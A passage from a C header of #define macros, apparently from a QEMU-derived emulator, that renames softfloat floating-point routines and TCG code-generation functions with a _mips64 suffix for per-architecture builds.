float16_to_int32_round_to_zero float16_to_int32_round_to_zero_mips64 #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_mips64 #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_mips64 #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_mips64 #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_mips64 #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_mips64 #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_mips64 #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_mips64 #define float16_to_uint16_scalbn float16_to_uint16_scalbn_mips64 #define float16_to_uint32_scalbn float16_to_uint32_scalbn_mips64 #define float16_to_uint64_scalbn float16_to_uint64_scalbn_mips64 #define float32_to_uint16_scalbn float32_to_uint16_scalbn_mips64 #define float32_to_uint32_scalbn float32_to_uint32_scalbn_mips64 #define float32_to_uint64_scalbn float32_to_uint64_scalbn_mips64 #define float64_to_uint16_scalbn float64_to_uint16_scalbn_mips64 #define float64_to_uint32_scalbn float64_to_uint32_scalbn_mips64 #define float64_to_uint64_scalbn float64_to_uint64_scalbn_mips64 #define float16_to_uint16 float16_to_uint16_mips64 #define float16_to_uint32 float16_to_uint32_mips64 #define float16_to_uint64 float16_to_uint64_mips64 #define float32_to_uint16 float32_to_uint16_mips64 #define float32_to_uint32 float32_to_uint32_mips64 #define float32_to_uint64 float32_to_uint64_mips64 #define float64_to_uint16 float64_to_uint16_mips64 #define float64_to_uint32 float64_to_uint32_mips64 #define float64_to_uint64 float64_to_uint64_mips64 #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_mips64 #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_mips64 #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_mips64 #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_mips64 #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_mips64 #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_mips64 #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_mips64 #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_mips64 #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_mips64 #define int64_to_float16_scalbn int64_to_float16_scalbn_mips64 #define int32_to_float16_scalbn int32_to_float16_scalbn_mips64 #define int16_to_float16_scalbn int16_to_float16_scalbn_mips64 #define int64_to_float16 int64_to_float16_mips64 #define int32_to_float16 int32_to_float16_mips64 #define int16_to_float16 int16_to_float16_mips64 #define int64_to_float32_scalbn int64_to_float32_scalbn_mips64 #define int32_to_float32_scalbn int32_to_float32_scalbn_mips64 #define int16_to_float32_scalbn int16_to_float32_scalbn_mips64 #define int64_to_float32 int64_to_float32_mips64 #define int32_to_float32 int32_to_float32_mips64 #define int16_to_float32 int16_to_float32_mips64 #define int64_to_float64_scalbn int64_to_float64_scalbn_mips64 #define int32_to_float64_scalbn int32_to_float64_scalbn_mips64 #define int16_to_float64_scalbn int16_to_float64_scalbn_mips64 #define int64_to_float64 int64_to_float64_mips64 #define int32_to_float64 int32_to_float64_mips64 #define int16_to_float64 int16_to_float64_mips64 #define uint64_to_float16_scalbn uint64_to_float16_scalbn_mips64 #define uint32_to_float16_scalbn uint32_to_float16_scalbn_mips64 #define uint16_to_float16_scalbn uint16_to_float16_scalbn_mips64 #define uint64_to_float16 uint64_to_float16_mips64 #define uint32_to_float16 uint32_to_float16_mips64 #define uint16_to_float16 uint16_to_float16_mips64 #define uint64_to_float32_scalbn uint64_to_float32_scalbn_mips64 #define uint32_to_float32_scalbn uint32_to_float32_scalbn_mips64 #define uint16_to_float32_scalbn uint16_to_float32_scalbn_mips64 #define uint64_to_float32 uint64_to_float32_mips64 #define uint32_to_float32 uint32_to_float32_mips64 #define uint16_to_float32 uint16_to_float32_mips64 #define uint64_to_float64_scalbn uint64_to_float64_scalbn_mips64 #define uint32_to_float64_scalbn uint32_to_float64_scalbn_mips64 #define uint16_to_float64_scalbn uint16_to_float64_scalbn_mips64 #define uint64_to_float64 uint64_to_float64_mips64 #define uint32_to_float64 uint32_to_float64_mips64 #define uint16_to_float64 uint16_to_float64_mips64 #define float16_min float16_min_mips64 #define float16_minnum float16_minnum_mips64 #define float16_minnummag float16_minnummag_mips64 #define float16_max float16_max_mips64 #define float16_maxnum float16_maxnum_mips64 #define float16_maxnummag float16_maxnummag_mips64 #define float32_min float32_min_mips64 #define float32_minnum float32_minnum_mips64 #define float32_minnummag float32_minnummag_mips64 #define float32_max float32_max_mips64 #define float32_maxnum float32_maxnum_mips64 #define float32_maxnummag float32_maxnummag_mips64 #define float64_min float64_min_mips64 #define float64_minnum float64_minnum_mips64 #define float64_minnummag float64_minnummag_mips64 #define float64_max float64_max_mips64 #define float64_maxnum float64_maxnum_mips64 #define float64_maxnummag float64_maxnummag_mips64 #define float16_compare float16_compare_mips64 #define float16_compare_quiet float16_compare_quiet_mips64 #define float32_compare float32_compare_mips64 #define float32_compare_quiet float32_compare_quiet_mips64 #define float64_compare float64_compare_mips64 #define float64_compare_quiet float64_compare_quiet_mips64 #define float16_scalbn float16_scalbn_mips64 #define float32_scalbn float32_scalbn_mips64 #define float64_scalbn float64_scalbn_mips64 #define float16_sqrt float16_sqrt_mips64 #define float32_sqrt float32_sqrt_mips64 #define float64_sqrt float64_sqrt_mips64 #define float16_default_nan float16_default_nan_mips64 #define float32_default_nan float32_default_nan_mips64 #define float64_default_nan float64_default_nan_mips64 #define float128_default_nan float128_default_nan_mips64 #define float16_silence_nan float16_silence_nan_mips64 #define float32_silence_nan float32_silence_nan_mips64 #define float64_silence_nan float64_silence_nan_mips64 #define float16_squash_input_denormal float16_squash_input_denormal_mips64 #define float32_squash_input_denormal float32_squash_input_denormal_mips64 #define float64_squash_input_denormal float64_squash_input_denormal_mips64 #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_mips64 #define roundAndPackFloatx80 roundAndPackFloatx80_mips64 #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_mips64 #define int32_to_floatx80 int32_to_floatx80_mips64 #define int32_to_float128 int32_to_float128_mips64 #define int64_to_floatx80 int64_to_floatx80_mips64 #define int64_to_float128 int64_to_float128_mips64 #define uint64_to_float128 uint64_to_float128_mips64 #define float32_to_floatx80 float32_to_floatx80_mips64 #define float32_to_float128 float32_to_float128_mips64 #define float32_rem float32_rem_mips64 #define float32_exp2 float32_exp2_mips64 #define float32_log2 float32_log2_mips64 #define float32_eq float32_eq_mips64 #define float32_le float32_le_mips64 #define float32_lt float32_lt_mips64 #define float32_unordered float32_unordered_mips64 #define float32_eq_quiet float32_eq_quiet_mips64 #define float32_le_quiet float32_le_quiet_mips64 #define float32_lt_quiet float32_lt_quiet_mips64 #define float32_unordered_quiet float32_unordered_quiet_mips64 #define float64_to_floatx80 float64_to_floatx80_mips64 #define float64_to_float128 float64_to_float128_mips64 #define float64_rem float64_rem_mips64 #define float64_log2 float64_log2_mips64 #define float64_eq float64_eq_mips64 #define float64_le float64_le_mips64 #define float64_lt float64_lt_mips64 #define float64_unordered float64_unordered_mips64 #define float64_eq_quiet float64_eq_quiet_mips64 #define float64_le_quiet float64_le_quiet_mips64 #define float64_lt_quiet float64_lt_quiet_mips64 #define float64_unordered_quiet float64_unordered_quiet_mips64 #define floatx80_to_int32 floatx80_to_int32_mips64 #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_mips64 #define floatx80_to_int64 floatx80_to_int64_mips64 #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_mips64 #define floatx80_to_float32 floatx80_to_float32_mips64 #define floatx80_to_float64 floatx80_to_float64_mips64 #define floatx80_to_float128 floatx80_to_float128_mips64 #define floatx80_round floatx80_round_mips64 #define floatx80_round_to_int floatx80_round_to_int_mips64 #define floatx80_add floatx80_add_mips64 #define floatx80_sub floatx80_sub_mips64 #define floatx80_mul floatx80_mul_mips64 #define floatx80_div floatx80_div_mips64 #define floatx80_rem floatx80_rem_mips64 #define floatx80_sqrt floatx80_sqrt_mips64 #define floatx80_eq floatx80_eq_mips64 #define floatx80_le floatx80_le_mips64 #define floatx80_lt floatx80_lt_mips64 #define floatx80_unordered floatx80_unordered_mips64 #define floatx80_eq_quiet floatx80_eq_quiet_mips64 #define floatx80_le_quiet floatx80_le_quiet_mips64 #define floatx80_lt_quiet floatx80_lt_quiet_mips64 #define floatx80_unordered_quiet floatx80_unordered_quiet_mips64 #define float128_to_int32 float128_to_int32_mips64 #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_mips64 #define float128_to_int64 float128_to_int64_mips64 #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_mips64 #define float128_to_uint64 float128_to_uint64_mips64 #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_mips64 #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_mips64 #define float128_to_uint32 float128_to_uint32_mips64 #define float128_to_float32 float128_to_float32_mips64 #define float128_to_float64 float128_to_float64_mips64 #define float128_to_floatx80 float128_to_floatx80_mips64 #define float128_round_to_int float128_round_to_int_mips64 #define float128_add float128_add_mips64 #define float128_sub float128_sub_mips64 #define float128_mul float128_mul_mips64 #define float128_div float128_div_mips64 #define float128_rem float128_rem_mips64 #define float128_sqrt float128_sqrt_mips64 #define float128_eq float128_eq_mips64 #define float128_le float128_le_mips64 #define float128_lt float128_lt_mips64 #define float128_unordered float128_unordered_mips64 #define float128_eq_quiet float128_eq_quiet_mips64 #define float128_le_quiet float128_le_quiet_mips64 #define float128_lt_quiet float128_lt_quiet_mips64 #define float128_unordered_quiet float128_unordered_quiet_mips64 #define floatx80_compare floatx80_compare_mips64 #define floatx80_compare_quiet floatx80_compare_quiet_mips64 #define float128_compare float128_compare_mips64 #define float128_compare_quiet float128_compare_quiet_mips64 #define floatx80_scalbn floatx80_scalbn_mips64 #define float128_scalbn float128_scalbn_mips64 #define softfloat_init softfloat_init_mips64 #define tcg_optimize tcg_optimize_mips64 #define gen_new_label gen_new_label_mips64 #define tcg_can_emit_vec_op tcg_can_emit_vec_op_mips64 #define tcg_expand_vec_op tcg_expand_vec_op_mips64 #define tcg_register_jit tcg_register_jit_mips64 #define tcg_tb_insert tcg_tb_insert_mips64 #define tcg_tb_remove tcg_tb_remove_mips64 #define tcg_tb_lookup tcg_tb_lookup_mips64 #define tcg_tb_foreach tcg_tb_foreach_mips64 #define tcg_nb_tbs tcg_nb_tbs_mips64 #define tcg_region_reset_all tcg_region_reset_all_mips64 #define tcg_region_init tcg_region_init_mips64 #define tcg_code_size tcg_code_size_mips64 #define tcg_code_capacity tcg_code_capacity_mips64 #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_mips64 #define tcg_malloc_internal tcg_malloc_internal_mips64 #define tcg_pool_reset tcg_pool_reset_mips64 #define tcg_context_init tcg_context_init_mips64 #define tcg_tb_alloc tcg_tb_alloc_mips64 #define tcg_prologue_init tcg_prologue_init_mips64 #define tcg_func_start tcg_func_start_mips64 #define tcg_set_frame tcg_set_frame_mips64 #define tcg_global_mem_new_internal tcg_global_mem_new_internal_mips64 #define tcg_temp_new_internal tcg_temp_new_internal_mips64 #define tcg_temp_new_vec tcg_temp_new_vec_mips64 #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_mips64 #define tcg_temp_free_internal tcg_temp_free_internal_mips64 #define tcg_const_i32 tcg_const_i32_mips64 #define tcg_const_i64 tcg_const_i64_mips64 #define tcg_const_local_i32 tcg_const_local_i32_mips64 #define tcg_const_local_i64 tcg_const_local_i64_mips64 #define tcg_op_supported tcg_op_supported_mips64 #define tcg_gen_callN tcg_gen_callN_mips64 #define tcg_op_remove tcg_op_remove_mips64 #define tcg_emit_op tcg_emit_op_mips64 #define tcg_op_insert_before tcg_op_insert_before_mips64 #define tcg_op_insert_after tcg_op_insert_after_mips64 #define tcg_cpu_exec_time tcg_cpu_exec_time_mips64 #define tcg_gen_code tcg_gen_code_mips64 #define tcg_gen_op1 tcg_gen_op1_mips64 #define tcg_gen_op2 tcg_gen_op2_mips64 #define tcg_gen_op3 tcg_gen_op3_mips64 #define tcg_gen_op4 tcg_gen_op4_mips64 #define tcg_gen_op5 tcg_gen_op5_mips64 #define tcg_gen_op6 tcg_gen_op6_mips64 #define tcg_gen_mb tcg_gen_mb_mips64 #define tcg_gen_addi_i32 tcg_gen_addi_i32_mips64 #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_mips64 #define tcg_gen_subi_i32 tcg_gen_subi_i32_mips64 #define tcg_gen_andi_i32 tcg_gen_andi_i32_mips64 #define tcg_gen_ori_i32 tcg_gen_ori_i32_mips64 #define tcg_gen_xori_i32 tcg_gen_xori_i32_mips64 #define tcg_gen_shli_i32 tcg_gen_shli_i32_mips64 #define tcg_gen_shri_i32 tcg_gen_shri_i32_mips64 #define tcg_gen_sari_i32 tcg_gen_sari_i32_mips64 #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_mips64 #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_mips64 #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_mips64 #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_mips64 #define tcg_gen_muli_i32 tcg_gen_muli_i32_mips64 #define tcg_gen_div_i32 tcg_gen_div_i32_mips64 #define tcg_gen_rem_i32 tcg_gen_rem_i32_mips64 #define tcg_gen_divu_i32 tcg_gen_divu_i32_mips64 #define tcg_gen_remu_i32 tcg_gen_remu_i32_mips64 #define tcg_gen_andc_i32 tcg_gen_andc_i32_mips64 #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_mips64 #define tcg_gen_nand_i32 tcg_gen_nand_i32_mips64 #define tcg_gen_nor_i32 tcg_gen_nor_i32_mips64 #define tcg_gen_orc_i32 tcg_gen_orc_i32_mips64 #define tcg_gen_clz_i32 tcg_gen_clz_i32_mips64 #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_mips64 #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_mips64 #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_mips64 #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_mips64 #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_mips64 #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_mips64 #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_mips64 #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_mips64 #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_mips64 #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_mips64 #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_mips64 #define tcg_gen_extract_i32 tcg_gen_extract_i32_mips64 #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_mips64 #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_mips64 #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_mips64 #define tcg_gen_add2_i32 tcg_gen_add2_i32_mips64 #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_mips64 #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_mips64 #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_mips64 #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_mips64 #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_mips64 #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_mips64 #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_mips64 #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_mips64 #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_mips64 #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_mips64 #define tcg_gen_smin_i32 tcg_gen_smin_i32_mips64 #define tcg_gen_umin_i32 tcg_gen_umin_i32_mips64 #define tcg_gen_smax_i32 tcg_gen_smax_i32_mips64 #define tcg_gen_umax_i32 tcg_gen_umax_i32_mips64 #define tcg_gen_abs_i32 tcg_gen_abs_i32_mips64 #define tcg_gen_addi_i64 tcg_gen_addi_i64_mips64 #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_mips64 #define tcg_gen_subi_i64 tcg_gen_subi_i64_mips64 #define tcg_gen_andi_i64 tcg_gen_andi_i64_mips64 #define tcg_gen_ori_i64 tcg_gen_ori_i64_mips64 #define tcg_gen_xori_i64 tcg_gen_xori_i64_mips64 #define tcg_gen_shli_i64 tcg_gen_shli_i64_mips64 #define tcg_gen_shri_i64 tcg_gen_shri_i64_mips64 #define tcg_gen_sari_i64 tcg_gen_sari_i64_mips64 #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_mips64 #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_mips64 #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_mips64 #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_mips64 #define tcg_gen_muli_i64 tcg_gen_muli_i64_mips64 #define tcg_gen_div_i64 tcg_gen_div_i64_mips64 #define tcg_gen_rem_i64 tcg_gen_rem_i64_mips64 #define tcg_gen_divu_i64 tcg_gen_divu_i64_mips64 #define tcg_gen_remu_i64 tcg_gen_remu_i64_mips64 #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_mips64 #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_mips64 #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_mips64 #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_mips64 #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_mips64 #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_mips64 #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_mips64 #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_mips64 #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_mips64 #define tcg_gen_not_i64 tcg_gen_not_i64_mips64 #define tcg_gen_andc_i64 tcg_gen_andc_i64_mips64 #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_mips64 #define tcg_gen_nand_i64 tcg_gen_nand_i64_mips64 #define tcg_gen_nor_i64 tcg_gen_nor_i64_mips64 #define tcg_gen_orc_i64 tcg_gen_orc_i64_mips64 #define tcg_gen_clz_i64 tcg_gen_clz_i64_mips64 #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_mips64 #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_mips64 #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_mips64 #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_mips64 #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_mips64 #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_mips64 #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_mips64 #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_mips64 #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_mips64 #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_mips64 #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_mips64 #define tcg_gen_extract_i64 tcg_gen_extract_i64_mips64 #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_mips64 #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_mips64 #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_mips64 #define tcg_gen_add2_i64 tcg_gen_add2_i64_mips64 #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_mips64 #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_mips64 #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_mips64 #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_mips64 #define tcg_gen_smin_i64 tcg_gen_smin_i64_mips64 #define tcg_gen_umin_i64 tcg_gen_umin_i64_mips64 #define tcg_gen_smax_i64 tcg_gen_smax_i64_mips64 #define tcg_gen_umax_i64 tcg_gen_umax_i64_mips64 #define tcg_gen_abs_i64 tcg_gen_abs_i64_mips64 #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_mips64 #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_mips64 #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_mips64 #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_mips64 #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_mips64 #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_mips64 #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_mips64 #define tcg_gen_exit_tb tcg_gen_exit_tb_mips64 #define tcg_gen_goto_tb tcg_gen_goto_tb_mips64 #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_mips64 #define check_exit_request check_exit_request_mips64 #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_mips64 #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_mips64 #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_mips64 #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_mips64 #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_mips64 #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_mips64 #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_mips64 #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_mips64 #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_mips64 #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_mips64 #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_mips64 #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_mips64 #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_mips64 #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_mips64 #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_mips64 #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_mips64 #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_mips64 #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_mips64 #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_mips64 #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_mips64 #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_mips64 #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_mips64 #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_mips64 #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_mips64 #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_mips64 #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_mips64 #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_mips64 #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_mips64 #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_mips64 #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_mips64 #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_mips64 #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_mips64 #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_mips64 #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_mips64 #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_mips64 #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_mips64 #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_mips64 #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_mips64 #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_mips64 #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_mips64 #define simd_desc simd_desc_mips64 #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_mips64 #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_mips64 #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_mips64 #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_mips64 #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_mips64 #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_mips64 #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_mips64 #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_mips64 #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_mips64 #define tcg_gen_gvec_2 tcg_gen_gvec_2_mips64 #define tcg_gen_gvec_2i tcg_gen_gvec_2i_mips64 #define tcg_gen_gvec_2s tcg_gen_gvec_2s_mips64 #define tcg_gen_gvec_3 tcg_gen_gvec_3_mips64 #define tcg_gen_gvec_3i tcg_gen_gvec_3i_mips64 #define tcg_gen_gvec_4 tcg_gen_gvec_4_mips64 #define tcg_gen_gvec_mov tcg_gen_gvec_mov_mips64 #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_mips64 #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_mips64 #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_mips64 #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_mips64 #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_mips64 #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_mips64 #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_mips64 #define tcg_gen_gvec_not tcg_gen_gvec_not_mips64 #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_mips64 #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_mips64 #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_mips64 #define tcg_gen_gvec_add tcg_gen_gvec_add_mips64 #define tcg_gen_gvec_adds tcg_gen_gvec_adds_mips64 #define tcg_gen_gvec_addi tcg_gen_gvec_addi_mips64 #define tcg_gen_gvec_subs tcg_gen_gvec_subs_mips64 #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_mips64 #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_mips64 #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_mips64 #define tcg_gen_gvec_sub tcg_gen_gvec_sub_mips64 #define tcg_gen_gvec_mul tcg_gen_gvec_mul_mips64 #define tcg_gen_gvec_muls tcg_gen_gvec_muls_mips64 #define tcg_gen_gvec_muli tcg_gen_gvec_muli_mips64 #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_mips64 #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_mips64 #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_mips64 #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_mips64 #define tcg_gen_gvec_smin tcg_gen_gvec_smin_mips64 #define tcg_gen_gvec_umin tcg_gen_gvec_umin_mips64 #define tcg_gen_gvec_smax tcg_gen_gvec_smax_mips64 #define tcg_gen_gvec_umax tcg_gen_gvec_umax_mips64 #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_mips64 #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_mips64 #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_mips64 #define tcg_gen_gvec_neg tcg_gen_gvec_neg_mips64 #define tcg_gen_gvec_abs tcg_gen_gvec_abs_mips64 #define tcg_gen_gvec_and tcg_gen_gvec_and_mips64 #define tcg_gen_gvec_or tcg_gen_gvec_or_mips64 #define tcg_gen_gvec_xor tcg_gen_gvec_xor_mips64 #define tcg_gen_gvec_andc tcg_gen_gvec_andc_mips64 #define tcg_gen_gvec_orc tcg_gen_gvec_orc_mips64 #define tcg_gen_gvec_nand tcg_gen_gvec_nand_mips64 #define tcg_gen_gvec_nor tcg_gen_gvec_nor_mips64 #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_mips64 #define tcg_gen_gvec_ands tcg_gen_gvec_ands_mips64 #define tcg_gen_gvec_andi tcg_gen_gvec_andi_mips64 #define tcg_gen_gvec_xors tcg_gen_gvec_xors_mips64 #define tcg_gen_gvec_xori tcg_gen_gvec_xori_mips64 #define tcg_gen_gvec_ors tcg_gen_gvec_ors_mips64 #define tcg_gen_gvec_ori tcg_gen_gvec_ori_mips64 #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_mips64 #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_mips64 #define tcg_gen_gvec_shli tcg_gen_gvec_shli_mips64 #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_mips64 #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_mips64 #define tcg_gen_gvec_shri tcg_gen_gvec_shri_mips64 #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_mips64 #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_mips64 #define tcg_gen_gvec_sari tcg_gen_gvec_sari_mips64 #define tcg_gen_gvec_shls tcg_gen_gvec_shls_mips64 #define 